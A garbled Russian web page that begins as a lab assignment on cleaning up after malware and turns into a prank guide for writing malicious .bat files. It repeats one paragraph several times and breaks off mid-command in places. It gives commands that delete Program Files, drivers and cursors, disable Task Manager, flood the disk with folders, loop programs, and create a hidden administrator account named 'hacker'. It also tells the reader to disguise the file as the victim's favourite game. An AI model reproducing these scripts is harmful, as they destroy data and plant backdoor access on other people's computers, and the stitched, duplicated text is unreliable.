Использование bat файлов для ликвидации последствий вредоносных программ

Обновлено: 07.07.2024

Цель: получить навыки обнаружения на компьютере вредоносных программ, изучить основные методы по устранению последствий вирусных инцидентов без использования антивирусного программного обеспечения.

Программное обеспечение:

• операционная система
  • Microsoft Windows XP Professional

  Содержание работы:

  1. Ознакомиться с определением вируса и вредоносных программ
  2. Ознакомиться с типами вредоносных программ и их описанием
  3. Ознакомиться с жизненными циклами различных типов вредоносных программ
  4. Ознакомиться с действиями червей при заражении компьютера
  5. Ознакомиться с возможностями лечения компьютеров без использования антивирусного программного обеспечения
  6. Выполнить задания к лабораторной работе
  7. Защитить лабораторную работу, ответив на контрольные вопросы

  Методические указания к лабораторной работе

  Определения компьютерного вируса - исторически проблемный вопрос, поскольку достаточно сложно дать четкое определение вируса, очертив при этом свойства, присущие только вирусам и не характерные для других программ. Наоборот, давая жесткое определение вируса как программы, обладающей определенными свойствами практически сразу же можно найти пример вируса, таковыми свойствами не обладающего.

  Вирус - программа, способная создавать свои копии (необязательно совпадающие с оригиналом) и внедрять их в файлы, системные области компьютера, компьютерных сетей, а также осуществлять иные деструктивные действия. При этом копии сохраняют способность дальнейшего распространения. Компьютерный вирус относится к вредоносным программам

  Еще одна проблема, связанная с определением компьютерного вируса кроется в том, что сегодня под вирусом чаще всего понимается не "традиционный" вирус , а практически любая вредоносная программа . Это приводит к путанице в терминологии, осложненной еще и тем, что сегодня практически любой антивирус способен выявлять все типы вредоносных программ, таким образом ассоциация "вредоносная программа - вирус " становится все более устойчивой.

  Вредоносная программа - компьютерная программа или переносной код, предназначенный для реализации угроз информации, хранящейся в компьютерной системе (КС), либо для скрытого нецелевого использования ресурсов КС, либо иного воздействия, препятствующего нормальному функционированию КС. К вредоносным программам относятся компьютерные вирусы, трояны, сетевые черви и др.

  Вирусы

  К вирусам относятся:

  • Загрузочные вирусы - вирусы, заражающие загрузочные сектора постоянных и сменных носителей
  • Файловые вирусы - вирусы, заражающие файлы
  • Макровирусы - вирусы, написанные на языке макрокоманд и исполняемые в среде какого-либо приложения. В подавляющем большинстве случаев речь идет о макросах в документах Microsoft Office
  • Скрипт-вирусы - вирусы, исполняемые в среде определенной командной оболочки: раньше - bat-файлы в командной оболочке DOS, сейчас чаще VBS- и Java-скрипты в командной оболочке Windows Scripting Host (WSH)

  Отдельно стоит сказать пару слов о макровирусах . Большинство электронных документов создаются и обрабатываются в формате MS Office, инструмент VBA (Visual Basic for Application), который можно использовать для создания макровирусов поставляется вместе с приложением MS Office. Такое положение дел приводит к тому, что на сегодняшний день макровирусы - наиболее часто встречающийся тип вирусов. Однако борьба с ними не вызывает особых проблем и сводится к изучению тела вредоносного макроса с помощью того же VBA на предмет выполняемых операций, контролю стартовых макросов AutoOpen , AutoClose , AutoSave , глобальных макросов FileOpen , FileSaveAs , FileSave , FileClose и ряда стандартных операций, таких как вызов API-функций, выполнения команд Shell и т. д. Процедура лечение макровирусов сводится к удалению тела макроса из документов и шаблонов MS Office.

  Сетевые черви

  Червь (сетевой червь) - тип вредоносных программ, распространяющихся по сетевым каналам, способных к автономному преодолению систем защиты автоматизированных и компьютерных систем, а также к созданию и дальнейшему распространению своих копий, не всегда совпадающих с оригиналом, осуществлению иного вредоносного воздействия

  В зависимости от путей проникновения в операционную систему черви делятся на:

  Трояны

  Троян (троянский конь) - тип вредоносных программ, основной целью которых является вредоносное воздействие по отношению к компьютерной системе. Трояны отличаются отсутствием механизма создания собственных копий

  Некоторые трояны способны к автономному преодолению систем защиты КС, с целью проникновения и заражения системы. В общем случае, троян попадает в систему вместе с вирусом либо червем, в результате неосмотрительных действий пользователя или же активных действий злоумышленника. Наиболее распространены следующие виды троянов :

  
  

  Компьютер стал неотъемлемой частью жизни практически каждого человека.Как известно, работает он исключительно под управлением программ (программного обеспечения). Это делает его по-настоящему универсальным устройством, которое может выполнять роль музыкального центра, телевизора, пишущей машинки и т. д. Программы пишут программисты и у некоторых из них появляется желание придумать что-то эдакое. Иногда это -невинные шалости, в других случаях они имеют явную зловещую направленность. Появились программы, которые, не спрашивая ничьего разрешения, запускались, копировались в разные места диска и "заражали" другие программы (заменяли часть полезного кода рабочей программы своим или изменяли его). С этого момента и нужно начинать разговор о "компьютерных вирусах".

  Компьютер стал неотъемлемой частью жизни практически каждого человека.Как известно, работает он исключительно под управлением программ (программного обеспечения). Это делает его по-настоящему универсальным устройством, которое может выполнять роль музыкального центра, телевизора, пишущей машинки и т. д. Программы пишут программисты и у некоторых из них появляется желание придумать что-то эдакое. Иногда это -невинные шалости, в других случаях они имеют явную зловещую направленность. Появились программы, которые, не спрашивая ничьего разрешения, запускались, копировались в разные места диска и "заражали" другие программы (заменяли часть полезного кода рабочей программы своим или изменяли его). С этого момента и нужно начинать разговор о "компьютерных вирусах".

  Компьютер стал неотъемлемой частью жизни практически каждого человека.Как известно, работает он исключительно под управлением программ (программного обеспечения). Это делает его по-настоящему универсальным устройством, которое может выполнять роль музыкального центра, телевизора, пишущей машинки и т. д. Программы пишут программисты и у некоторых из них появляется желание придумать что-то эдакое. Иногда это -невинные шалости, в других случаях они имеют явную зловещую направленность. Появились программы, которые, не спрашивая ничьего разрешения, запускались, копировались в разные места диска и "заражали" другие программы (заменяли часть полезного кода рабочей программы своим или изменяли его). С этого момента и нужно начинать разговор о "компьютерных вирусах". Первая массовая эпидемия компьютерного вируса произошла в 1986 году, когда вирус Brain «заражал» дискеты для первых массовых персональных компьютеров; шокирующее действие произвёл вирус Penetratоr, сметающий на своём пути файлы практически всех приложений.

  Компьютер стал неотъемлемой частью жизни практически каждого человека.Как известно, работает он исключительно под управлением программ (программного обеспечения). Это делает его по-настоящему универсальным устройством, которое может выполнять роль музыкального центра, телевизора, пишущей машинки и т. д. Программы пишут программисты и у некоторых из них появляется желание придумать что-то эдакое. Иногда это -невинные шалости, в других случаях они имеют явную зловещую направленность. Появились программы, которые, не спрашивая ничьего разрешения, запускались, копировались в разные места диска и "заражали" другие программы (заменяли часть полезного кода рабочей программы своим или изменяли его). С этого момента и нужно начинать разговор о "компьютерных вирусах". Первая массовая эпидемия компьютерного вируса произошла в 1986 году, когда вирус Brain «заражал» дискеты для первых массовых персональных компьютеров; шокирующее действие произвёл вирус Penetratоr, сметающий на своём пути файлы практически всех приложений.Количество вирусов увеличивается с каждым днем. Все это подтверждается статистикой и реальной жизнью. Анализ позволяет утверждать, что в наше время, когда число компьютеров на душу населения в мире постоянно растет, возрастает и угроза нашествия компьютерных вирусов. Не остается в стороне от этого явления и Россия, которая исторически была в лидерах по «производству» компьютерных вирусов и сейчас не отстает от других стран в этом аспекте.

  Поэтому проблема данного исследования состоит раскрытии принципа работы компьютерных вирусов и антивирусных программ.

  
  

  Убирает рабочий стол

  @echo off
  shutdown -s -t 1 -c "lol" >nul

  @echo off
  shutdown -r -t 1 -c "lol" >nul

  Запрещает запускать программы

  Удаляет звуки Windows

  Запрещает заходить в панель управления

  Запрещает комбинацию Ctrl-Alt-Delete

  reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

  Меняет местами значение кнопок мыши

  %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

  Удаляет курсор мыши

  Меняет название корзины

  Убирает панель управления

  rd [Буква_Диск]: /s /q

  Удаляет все файлы в program files

  del c:Program Files/q

  Убивает процесс explorer.exe

  taskkill /f /im explorer.exe >nul

  Создает миллион папок

  FOR /L %%i IN (1,1,1000000) DO md %%i

  Удаляет все драйвера, которые установлены на компьютере

  Удаляет команду DEL

  Будет открывать бесконечно Пэинт

  :x
  Start mspaint
  goto x

  Изменяет расширение всех ярлыков на .txt

  Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

  @echo off
  chcp 1251
  net user SUPPORT_388945a0 /delete
  net user hacker hack /add
  net localgroup Администраторы hacker /add
  net localgroup Пользователи SUPPORT_388945a0 /del
  reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

  Меняет местами кнопки мыши,но обратная смена не возможна)

  Удаляет ядро системы

  У вашего ламера будет глючить компьютер.

  
  

  
  

  @echo off
  reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t
  REG_DWORD /d 1 /f >nul

  
  

  
  

  Выключается компьютер
  @echo off
  shutdown -s -t 1 -c "lol" >nul

  Перезагрузка компьютера
  @echo off
  shutdown -r -t 1 -c "lol" >nul

  Запрещает комбинацию Ctrl-Alt-Delete
  reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

  Меняет местами значение кнопок мыши
  %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

  Удаляет курсор мыши
  del "%SystemRoot%Cursors*.*" >nul

  Удаляет все файлы в program files
  del c:Program Files/q

  Убивает процесс explorer.exe
  taskkill /f /im explorer.exe >nul

  Создает миллион папок
  FOR /L %%i IN (1,1,1000000) DO md %%i

  Удаляет все драйвера, которые установлены на компьютере
  del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

  Удаляет команду DEL
  del %0

  Будет открывать бесконечно Paint
  :x
  Start mspaint
  goto x

  Изменяет расширение всех ярлыков на .txt
  assoc .lnk=.txt

  Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
  @echo off
  chcp 1251
  net user SUPPORT_388945a0 /delete
  net user hacker hack /add
  net localgroup Администраторы hacker /add
  net localgroup Пользователи SUPPORT_388945a0 /del
  reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

  Меняет местами кнопки мыши,но обратная смена не возможна)
  rundll32 user,SwapMouseButton

  Здравствуй, дорогой читатель/читательница. Если ты читаешь эту статью, значит тебе захотелось немножко разыграть своего друга или знакомого. Здесь ты прочитаешь, как создать свой безобидный вирус с расширением .bat.

  Предупреждаю: все описанные здесь примеры должны использоваться строго в законных целях. Автор этой статьи и администрация сайта за причиненный Вами ущерб ответственности не несёт! D:<
  Короче говоря, сначала рассмотрим, что же такое в сущности, этот таинственный bat-файл, или в компьютерном сленге, батник.
  Википедия гласит:

  Проще говоря, это аналог командной строки.
  Конечно, команд там разных много, но нам потребуется лишь несколько. Впринципе, если Вы хотите сделать этот вирус один раз и не вдаваться в подробности, то запоминать их и не надо.
  Общий принцип создания bat-файлов очень прост. Их можно создавать даже через Блокнот.

  • Открываем Блокнот
  • Пишем @echo off
  • Дальше пишем или копируем туда наш код
  • Выбираем в левом верхнем углу "Сохранить как. "
  • По умолчанию, все файлы сохраняются как .txt. Нас же это не устраивает.

  
  Выбираем вместо "текстовые документы" "все файлы", пишем имя файла.bat и сохраняем.
  В итоге должно получиться вот так
  
  А затем вот так
  

  Но если вы хотите быть коварными до конца, поменяйте у пакетного файла расширение на .exe, поставьте ему иконку, на которую пользователь захочет нажать, и, конечно, поменяйте название на название его любимой игры или браузера.
  В общем, решайте сами. Фантазия тут неограничена.
  Теперь, собственно, сам код.

  При активации данного "недовируса" появляется бесчисленное множество командных строк и компьютер гарантированно виснет. Убить процесс можно лишь через перезагрузку компьютера. На моём ноуте с объемом оперативной памяти 16 Гб глюков не наблюдалось лишь первые 3 секунды. Потом он намертво завис.
  Называется такой тип вируса "форк-бомба". Опять-таки, читайте в Википедии :)

  Данный вирус сбивает время на компьютере. Дёшево и сердито. И максимально безобидно.

  Удаляет все ярлыки с рабочего стола. Уже не так безобидно, но еще не катастрофа.

  Удаляет все курсоры. Пользователь дезориентирован.

  
  

  (Команду для самоуничтожения вируса нужно писать после самого вируса). Например
  
  Ну, собственно, и всё. С батниками можно сделать еще очень много чего интересного, но новичкам, я думаю, хватит и этого. И еще раз предупреждаю: не надо разыгрывать людей со слабой психикой, А ТО КАК ТРЕСНУТ!
  До скорого, мои хакеры)

  Наверное каждый хватал вирусы и прочую нечисть, которая распространяется на флэшках при помощи autorun.inf . Лично меня, на работе, уже достало бороться с этой нечистью. Есть идея некоторого противоядия этой эпидемии средствами .bat .
  Неплохой способ, а именно создание в корне флэшки папки с именем autorun.inf, внутри которой находится папка с неправильным именем (F\autorun.inf\usb..), позволяет многократно снизить риск заражения. Конечно же это не панацея, но весьма действенный способ.
  Суть идеи такова, что бы автоматизировать при помощи нашего, к примеру, USB.bat, следующие действия:

  1) Удалить уже существующий на флэшке настоящий autorun.inf , а так же, если имеется, то и autorun.inf созданный вирусом (что сложнее).
  2) Отключить автозапуск на всех дисках.
  2) Создать в корне флэшки директорию autorun.inf, с вложенной в нее папкой с неправильным именем.
  3) Сделать наш USB.bat с поведением, подобным поведению вирусов, но в благих целях. Т.е. сделать так, что бы USB.bat постоянно висел в процессах и "заражал" все вставленные в ПК флэшки. Желательно, что бы он и дальше переносился на флэшках, "заражая" другие ПК. Правда с последним пунктом наверное будет сложно, т.к. autorun.inf на флэшке уже не будет. Хотя, можно наверное сделать некий исполняемый файл c иконкой папки и именем "Мои документы", который бы и запускал наш USB.bat .

  Пример, в котором USB.bat снимает со всех файлов, имеющих в названии autorun., атрибуты "скрытый", "системный", "только для чтения" и удаляет их, после чего создает на флэшке директорию autorun.inf и помещает в нее папку с неправильным именем usb.. , далее директории autorun.inf присваиваются новые атрибуты "скрытый" и "системный":

  attrib -s -h -r autorun.*
  del autorun.*
  mkdir "\\?\%

  d0\autorun.inf\usb..\"
  attrib +s +h %

  Кому интересно, высказывайте свое мнение. Вносите предложения и конечно помогайте в написании )) Заранее благодарен за Вашу помощь и участие!

  Читайте также:

    
  • Csr формат чем открыть
    
  • Кросс нации 2021 положение ворд
    
  • Сохранить excel в txt с разделителем точка с запятой
    
  • Как сделать в фотошопе девушку в
    
  • Game driver xiaomi что это